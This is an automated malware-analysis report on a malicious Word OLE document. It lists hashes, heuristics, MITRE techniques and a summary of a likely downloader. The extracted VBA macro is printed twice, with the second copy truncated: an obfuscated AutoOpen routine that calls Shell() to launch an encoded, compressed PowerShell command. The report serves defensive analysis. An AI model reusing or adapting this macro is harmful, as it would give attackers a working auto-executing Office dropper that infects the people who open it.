Office (OLE) malware analysis — malicious · 730f4ec27eab7af0

MALICIOUS

Office (OLE)

68.9 KB First seen: 2020-02-04

MD5: b46cd9499273cf05b5e7132963cb9033 SHA-1: da0e64307a30dab3acf7afd5a288c330c609a6fe SHA-256: 730f4ec27eab7af0649afd7178ee05ff7970cf613bfaca17c6d2969eeb8c6881

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is an OLE document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, a critical indicator of malicious activity, to execute commands. The obfuscated nature of the script prevents a precise reconstruction of the command, but the use of Shell() strongly suggests the download and execution of a second-stage payload. The large slack space in the OLE structure is also a common characteristic of packed or obfuscated malicious documents.

Heuristics 6

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 70,523 bytes but its declared streams total only 35,455 bytes — 35,068 bytes (50%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6081 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6081 bytes
SHA-256: `c766f79c1eb20b6a03805116997526d11a906ac6d5fdef9ed8898d86d6e0d7b3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "foNiJLsQr" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function fSODOmNMk() On Error Resume Next For qfbsO = aVEAE To QrZTPP For qLwNi = lEGdv To 86061 jBfuKJ = (1660 / CBool(wzFzE) - pjwOp / Oct(51823 / Hex(85569) / CrSsi + Rnd(QTrJIS / Fix(37)))) Next OLiIF = 28652 - 24599 Next For NtPipw = IPGRt To zocRb For mcGwp = PaUTFj To 23178 XowCOs = (63149 / CBool(LbCqZq) - XCqdr / Oct(49922 / Hex(34896) / wasZV + Rnd(oJWFN / Fix(37)))) Next KqaDiq = 88191 - 32405 Next fSODOmNMk = ivMiR + Shell(RGWiMLSrDPl + Chr(AiknkvBZ + vbKeyP + KwDLjItFSJJ) + "owers" + WBUzimvvWWf + HwHznw + NiSjqWaKi + SdkMMcMi + sMJKiRLCHEQ, 17641 - 17641) For uwMYLz = OGUFF To BcWSLq For RfkLA = jbnvA To 61731 cCbfB = (20271 / CBool(XvQkI) - dozjPf / Oct(6563 / Hex(88269) / OOAYG + Rnd(paKUZ / Fix(37)))) Next FzAqR = 1268 - 72813 Next End Function Sub Autoopen() On Error Resume Next For WPzDPb = iHfUcH To nNfcE For hUFQij = pzpzf To 33750 pwOzJf = (50508 / CBool(TiAww) - LnLpww / Oct(34425 / Hex(5079) / jViDC + Rnd(RipLNZ / Fix(37)))) Next wiSZMW = 1552 - 52369 Next fSODOmNMk For ljhdJ = IiScnp To bbbYiC For KljRXp = WXmvBi To 37475 wWZXmZ = (13339 / CBool(klzTGr) - orwiFz / Oct(125 / Hex(31548) / UBlLj + Rnd(lGLscF / Fix(37)))) Next HPWDtw = 60134 - 44708 Next End Sub Attribute VB_Name = "WiZzDDDOkw" Function WBUzimvvWWf() On Error Resume Next For PLBOYM = UkZGQ To YEKaR For bWAuj = kzKiPl To 53753 cpEQw = (56153 / CBool(jFzEz) - zTQlv / Oct(46621 / Hex(35294) / TPQRan + Rnd(ApUni / Fix(37)))) Next jjzui = 77618 - 16584 Next buSHckDu = "HeLL -e IAAuACg" + "AKABnAGUA" + "VAAtAFYAQQ" + "ByAEkAYQBiAEwAZ" + "QAgACcAKg" + "BtA" + "EQAcgAqACcA" + "KQAuAE4AYQBNAGU" + "AWwAzA" For RBqlfk = usUNJJ To ZnwWp For fPiQTz = jRrRj To 18717 COaju = (5755 / CBool(GwAZUA) - JLvIwS / Oct(30617 / Hex(2514) / aRfUu + Rnd(BCdzFF / Fix(37)))) Next NRbmF = 48193 - 37018 Next JZuFw = "CwAMQAxACwAMgBd" + "AC0ASgBvAGkA" + "bgAnACc" + "AKQAoAG4ARQ" For qzzpaF = JlrnBr To POiqd For zwUuVw = djMMqi To 87585 SjiUXF = (87587 / CBool(ISEUNC) - DPvXf / Oct(89211 / Hex(58565) / TcHSc + Rnd(iwTzQ / Fix(37)))) Next iEWFqE = 6539 - 23374 Next RwZzjtBObYt = "BX" + "AC0AT" + "wBiAEoARQBDAH" + "QAIABJAG8AL" + "gBDAG8AbQBwAF" + "IARQBTAHM" + "ASQ" + "BPAG4ALgBEAEUA" + "RgBMAEEAdABlAFM" For RdkbTI = vKOpnb To rPmQT For VkWwFi = sphbqS To 55661 wXqJQ = (62379 / CBool(JjbJG) - iqDnjh / Oct(12292 / Hex(62656) / oWpJF + Rnd(dmwVw / Fix(37)))) Next tsvHC = 95823 - 39025 Next MEdnBRO = "AVAB" + "yAEUAYQ" + "Bt" + "ACgAW" For mUvXFO = dnHkWV To iUUHbw For wdoIlk = HjhkmE To 40678 aRDqF = (99702 / CBool(rlbmDJ) - nuWXvp / Oct(82943 / Hex(14441) / UiCVH + Rnd(AkRVOt / Fix(37)))) Next Ekqfz = 73952 - 5927 Next zZcVBRX = "wBzAHk" + "AcwBUA" + "EUATQAu" + "AG" + "kAbwAu" + "AG0ARQBNAE8Acg" For zhnjsm = OIfcT To jMDir For krVhu = kqlhQr To 8997 iVwOo = (27992 / CBool(mWIpma) - VYnBF / Oct(41264 / Hex(35428) / dzswIv + Rnd(jsnXOT / Fix(37)))) Next Pppdd = 96028 - 40538 Next wcBwiNaWcV = "BZA" + "FMAdAByAEU" + "AYQBNAF0AWwB" + "DAG8AbgB2" + "AGUAUgBUAF0AOg" + "A6AEYAcgBvAE" + "0AYgBBAF" + "MARQA2ADQAcw" + "B0" For rIHjV = tOmjm To rzVpGs For pPBOL = HIwLcs To 39400 RHkrY = (50978 / CBool(niBoc) - WSTzX / Oct(70715 / Hex(75648) / zpuvCN + Rnd(vCJqR / Fix(37)))) Next Zplzh = 34241 - 91240 Next tNqcK = "AHIASQBOAEcA" + "KAAgACcAVgBaAE" + "QAYg" + "BUAHMASgBB" For lAZiH = qiMFHh To TRpwWM For sbrzL = wdiBp To 36481 dMpVMu = (55422 / CBool(QqEjk) - GXvBLE / Oct(69998 / Hex(18788) / IbXHo + Rnd(vKPop / Fix(37)))) Next HbUjb = 69432 - 94683 Next wpFzKRfMK = "AE" + "U ... (truncated)

SHA-256: c766f79c1eb20b6a03805116997526d11a906ac6d5fdef9ed8898d86d6e0d7b3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "foNiJLsQr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function fSODOmNMk()
On Error Resume Next
For qfbsO = aVEAE To QrZTPP
      For qLwNi = lEGdv To 86061
         jBfuKJ = (1660 / CBool(wzFzE) - pjwOp / Oct(51823 / Hex(85569) / CrSsi + Rnd(QTrJIS / Fix(37))))
Next
   OLiIF = 28652 - 24599
Next
For NtPipw = IPGRt To zocRb
      For mcGwp = PaUTFj To 23178
         XowCOs = (63149 / CBool(LbCqZq) - XCqdr / Oct(49922 / Hex(34896) / wasZV + Rnd(oJWFN / Fix(37))))
Next
   KqaDiq = 88191 - 32405
Next
fSODOmNMk = ivMiR + Shell(RGWiMLSrDPl + Chr(AiknkvBZ + vbKeyP + KwDLjItFSJJ) + "owers" + WBUzimvvWWf + HwHznw + NiSjqWaKi + SdkMMcMi + sMJKiRLCHEQ, 17641 - 17641)
For uwMYLz = OGUFF To BcWSLq
      For RfkLA = jbnvA To 61731
         cCbfB = (20271 / CBool(XvQkI) - dozjPf / Oct(6563 / Hex(88269) / OOAYG + Rnd(paKUZ / Fix(37))))
Next
   FzAqR = 1268 - 72813
Next
End Function
Sub Autoopen()
On Error Resume Next
For WPzDPb = iHfUcH To nNfcE
      For hUFQij = pzpzf To 33750
         pwOzJf = (50508 / CBool(TiAww) - LnLpww / Oct(34425 / Hex(5079) / jViDC + Rnd(RipLNZ / Fix(37))))
Next
   wiSZMW = 1552 - 52369
Next
fSODOmNMk
For ljhdJ = IiScnp To bbbYiC
      For KljRXp = WXmvBi To 37475
         wWZXmZ = (13339 / CBool(klzTGr) - orwiFz / Oct(125 / Hex(31548) / UBlLj + Rnd(lGLscF / Fix(37))))
Next
   HPWDtw = 60134 - 44708
Next
End Sub


Attribute VB_Name = "WiZzDDDOkw"
Function WBUzimvvWWf()
On Error Resume Next
For PLBOYM = UkZGQ To YEKaR
      For bWAuj = kzKiPl To 53753
         cpEQw = (56153 / CBool(jFzEz) - zTQlv / Oct(46621 / Hex(35294) / TPQRan + Rnd(ApUni / Fix(37))))
Next
   jjzui = 77618 - 16584
Next
buSHckDu = "HeLL -e IAAuACg" + "AKABnAGUA" + "VAAtAFYAQQ" + "ByAEkAYQBiAEwAZ" + "QAgACcAKg" + "BtA" + "EQAcgAqACcA" + "KQAuAE4AYQBNAGU" + "AWwAzA"
For RBqlfk = usUNJJ To ZnwWp
      For fPiQTz = jRrRj To 18717
         COaju = (5755 / CBool(GwAZUA) - JLvIwS / Oct(30617 / Hex(2514) / aRfUu + Rnd(BCdzFF / Fix(37))))
Next
   NRbmF = 48193 - 37018
Next
JZuFw = "CwAMQAxACwAMgBd" + "AC0ASgBvAGkA" + "bgAnACc" + "AKQAoAG4ARQ"
For qzzpaF = JlrnBr To POiqd
      For zwUuVw = djMMqi To 87585
         SjiUXF = (87587 / CBool(ISEUNC) - DPvXf / Oct(89211 / Hex(58565) / TcHSc + Rnd(iwTzQ / Fix(37))))
Next
   iEWFqE = 6539 - 23374
Next
RwZzjtBObYt = "BX" + "AC0AT" + "wBiAEoARQBDAH" + "QAIABJAG8AL" + "gBDAG8AbQBwAF" + "IARQBTAHM" + "ASQ" + "BPAG4ALgBEAEUA" + "RgBMAEEAdABlAFM"
For RdkbTI = vKOpnb To rPmQT
      For VkWwFi = sphbqS To 55661
         wXqJQ = (62379 / CBool(JjbJG) - iqDnjh / Oct(12292 / Hex(62656) / oWpJF + Rnd(dmwVw / Fix(37))))
Next
   tsvHC = 95823 - 39025
Next
MEdnBRO = "AVAB" + "yAEUAYQ" + "Bt" + "ACgAW"
For mUvXFO = dnHkWV To iUUHbw
      For wdoIlk = HjhkmE To 40678
         aRDqF = (99702 / CBool(rlbmDJ) - nuWXvp / Oct(82943 / Hex(14441) / UiCVH + Rnd(AkRVOt / Fix(37))))
Next
   Ekqfz = 73952 - 5927
Next
zZcVBRX = "wBzAHk" + "AcwBUA" + "EUATQAu" + "AG" + "kAbwAu" + "AG0ARQBNAE8Acg"
For zhnjsm = OIfcT To jMDir
      For krVhu = kqlhQr To 8997
         iVwOo = (27992 / CBool(mWIpma) - VYnBF / Oct(41264 / Hex(35428) / dzswIv + Rnd(jsnXOT / Fix(37))))
Next
   Pppdd = 96028 - 40538
Next
wcBwiNaWcV = "BZA" + "FMAdAByAEU" + "AYQBNAF0AWwB" + "DAG8AbgB2" + "AGUAUgBUAF0AOg" + "A6AEYAcgBvAE" + "0AYgBBAF" + "MARQA2ADQAcw" + "B0"
For rIHjV = tOmjm To rzVpGs
      For pPBOL = HIwLcs To 39400
         RHkrY = (50978 / CBool(niBoc) - WSTzX / Oct(70715 / Hex(75648) / zpuvCN + Rnd(vCJqR / Fix(37))))
Next
   Zplzh = 34241 - 91240
Next
tNqcK = "AHIASQBOAEcA" + "KAAgACcAVgBaAE" + "QAYg" + "BUAHMASgBB"
For lAZiH = qiMFHh To TRpwWM
      For sbrzL = wdiBp To 36481
         dMpVMu = (55422 / CBool(QqEjk) - GXvBLE / Oct(69998 / Hex(18788) / IbXHo + Rnd(vKPop / Fix(37))))
Next
   HbUjb = 69432 - 94683
Next
wpFzKRfMK = "AE" + "U
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.